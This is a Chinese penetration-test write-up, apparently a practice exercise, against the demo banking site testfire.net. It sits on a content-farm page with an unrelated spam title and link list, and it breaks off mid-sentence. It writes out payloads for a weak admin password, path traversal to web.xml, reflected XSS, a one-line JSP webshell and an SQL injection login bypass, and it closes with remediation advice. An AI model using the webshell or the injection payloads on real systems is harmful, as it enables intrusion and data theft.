当前位置: 首页 > news >正文

手机网站左右滑动哪里可以鉴定钻石

手机网站左右滑动,哪里可以鉴定钻石,镇江软件公司,去视频网站做编辑器www.testfire.nets渗透测试报告 一、测试综述 1.1.测试⽬的 通过实施针对性的渗透测试#xff0c;发现testfire.net⽹站的安全漏洞#xff0c;锻炼自己的渗透水平 1.2.测试范围 域名#xff1a;www.testfire.net IP:65.61.137.117 测试时间#xff1a; 2023年11月…www.testfire.nets渗透测试报告 一、测试综述 1.1.测试⽬的 通过实施针对性的渗透测试发现testfire.net⽹站的安全漏洞锻炼自己的渗透水平 1.2.测试范围 域名www.testfire.net  IP:65.61.137.117 测试时间 2023年11月21日 说明 本次使用的渗透过程中使用的ip:192.168.85.128 1.3.数据来源 通过漏洞扫描和⼿动分析获取相关数据。 二、测试工具 根据测试的范围本次渗透测试可能⽤到的相关⼯具列表如下 (1)在线域名转化IP在线IP查询工具-支持本机外网,域名_蛙蛙工具 (iamwawa.cn) (2)Nmap: 进行目标端口的扫描 (3)dirsearch: 进行网站目录的扫描 (4)Burp抓包 三、渗透过程 3.1 信息收集 使用ping命令发现对方的ttl为105 可预知对方的操作系统为windows 使用nmap进行端口扫描 65.61.137.117 我们发现只有80网页端口进行开放说明我们目前根据这个结果只能进行网页的渗透 根据这点我们使用dirsearch进行网站目录扫描 因为扫出的目录比较多但很明显存在一个后台登入路径/admin 然后还可能存在一个目录穿越读取文件的漏洞 针对这个我们还是先进入后台 所以说信息收集总结就是 目标 www.testfire.net 服务器地址65.61.137.117开启了80 HTTP、443 HTTPS服务可能存在后台登入等漏洞 3.2 漏洞挖掘 3.2.1 后台管理员弱口令登入漏洞 我们进入后台发现存在弱口令admin/admin直接可以进入后台 我们成功进入后台后我们就可以进行下一步的渗透了 3.2.2 index.jsp路径下存在 web.xml配置文件泄露漏洞 首先我们在后台源码发现了如下路径 我们访问看看这个页面然后进行下一步的测试 经过测试我们发现读取/etc/passwd等重要文件不行说明网站的防护还是可以的 不过测试发现服务器为服务器信息windows-Apache Tomcat/7.0.92。 但是经过努力发现他是直接可以读取web.xml 的网站配置信息 Payload:http://65.61.137.117/index.jsp?content../WEB-INF/web.xml 通过这个我们得知了配置信息后 可以进行后续的准备更高级的攻击。 3.2.3 search框存在xss漏洞 在search框进行搜索的时候发现存在xss漏洞 Payload:scriptalert(2100101628xuwenlong)/script 点击go  输出为 2100101628xuwenlong 通过XSS漏洞可以获取用户 Cookie 等信息以实现进一步渗透。如果是存储型XSS那么还可以通过设置钓鱼登录框将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。 3.2.4 反馈页面存在任意文件上传漏洞 我们进入反馈页面 发现能够上传任意文件 如下 我们尝试修改文件内容为一句话 JSP webshell  木马内容为 %String cls request.getParameter(passwd);if (cls ! null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%  然后上传wenda.jsp 发现能够上传 却找不到文件上传的路径由于是测试网站甚至怀疑这里并没有做实际的保存工作而只是返回了结果信息。 3.2.5 登入存在sql注入 Payload: username:a OR 11-- 密码 随意 登入成功 以上就是该网站的漏洞挖掘过程 四、漏洞评级 1后台弱口令登入管理员漏洞中危 管理员用户功能不是很多主要包括可以管理用户更改管理员密码、创建用户、信息查询可以尝试进行SQL注入、转账功能此处无二次验证功能在实际网站中敏感业务操作设计应引入二次鉴权机制 2index.jsp路径下存在 web.xml配置文件泄露漏洞 :中危 如果文件目录下有更多的敏感信息那么危害会更大攻击者根据配置信息可采用远程攻击网站造成网站的破坏 3search框存在xss漏洞:  低危 通过XSS漏洞可以获取用户 Cookie 等信息以实现进一步渗透。 如果是存储型XSS那么还可以通过设置钓鱼登录框将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。 4反馈页面存在任意文件上传漏洞 低危 因为可能是个测试网站没有文件路径所以但是还是能上传一句话木马攻击者可通过一些攻击工具像weblogic实现不需要路径的getshell,来进行提权 5登入存在sql注入高危 用户通过发现注入后可采取sqlmap进行网站的数据库爬取造成数据的流失 五、修复建议 1.防止SQL注入最有效的方法就是限制输入、参数化传递 用户提交的数据显然这里并没有进行有效防护测试发现登录页面存在SQL注入漏洞 2.后台弱口令应该设置验证码或者强口令登入 3.防止文件路径遍历漏洞的最有效方法是避免将用户提供的输入完全传递给文件系统API。 如果认为不可避免的是将用户提供的输入传递给文件系统API则应同时使用两层防御以防止受到攻击 1应用程序应在处理之前验证用户输入。理想情况下验证应与允许值的白名单进行比较。如果所需的功能无法做到这一点则验证应验证输入内容仅包含允许的内容例如纯字母数字字符。 2验证提供的输入后应用程序应将输入附加到基本目录并使用平台文件系统API规范化路径。验证规范化路径以预期的基本目录开头。 4.修复对web.xml访问权限 可直接删除docs目录和examples目录 5.XSS漏洞修复课采取对输入的数据进行HTML转义使其不会识别为可执行脚本和白名单过滤等方法 6.文件上传漏洞给出的修复建议为 1. 服务器配置 2. 在服务端对上传文件进行检查 3. 对于图片文件进行二次渲染、压缩 避免图片写马。 4. 校验失败后记录错误日志信息内容至少包括时间、用户、IP、操作内容、校验失败的
http://www.yutouwan.com/news/20583/

相关文章:

  • 长沙网站公司怎么把网站维护
  • 美食网站开发的特点与总结宁波网站建设公司制作网站
  • 辽宁省住房和建设厅网站好的公司网站建设
  • 网站开发证网站没内容可以备案吗
  • 东莞网站建设网站做编程的 网站
  • 无锡网站排名团队网站建设论文html格式
  • 网站优化排名软件哪些最好dedecms调用不同数据库wordpress
  • 商城建站模板银川网站建设公司
  • 网站头部导航样式wordpress免费主题企业
  • 移动端网站推广wordpress 关闭搜索引擎
  • 专业做财经直播网站有哪些网站建设关于
  • 房地产开发公司网站源码成品网站w灬源码伊甸院
  • 校园网站建设策划书国际最新24小时军事消息
  • 如何选择一个好的优质网站建设公司十堰网站建设专家
  • 网站登录设计欣赏中国免费网站服务器
  • 宜兴城乡建设局网站阿里云1m 宽带做网站服务器
  • 北京东城做网站推广什么
  • 峡山网站建设电子商务网站建设课程设计思路
  • 有哪些网站做外贸的青岛建设企业网站
  • 专业网站开发制作公司旅游网站推荐
  • 哪个公司做农村产权交易网站关键词挖掘工具爱网
  • 优惠券网站怎么做的帝国cms网站源码
  • hyip系统网站开发56网站可以做电子相册
  • 建设网站作用英文网站优化
  • 网络营销上的网站建设流程wordpress 4 drupal 8
  • 厦门行业网站建设做网站维护承包合同
  • 上海网站建设制作百橙上海网站推广汉狮
  • 二十一冶建设有限公司网站wordpress languages
  • 前端做网站直播网站图片如何优化
  • 长沙专业做网站较好的公司网易企业邮箱设置pop3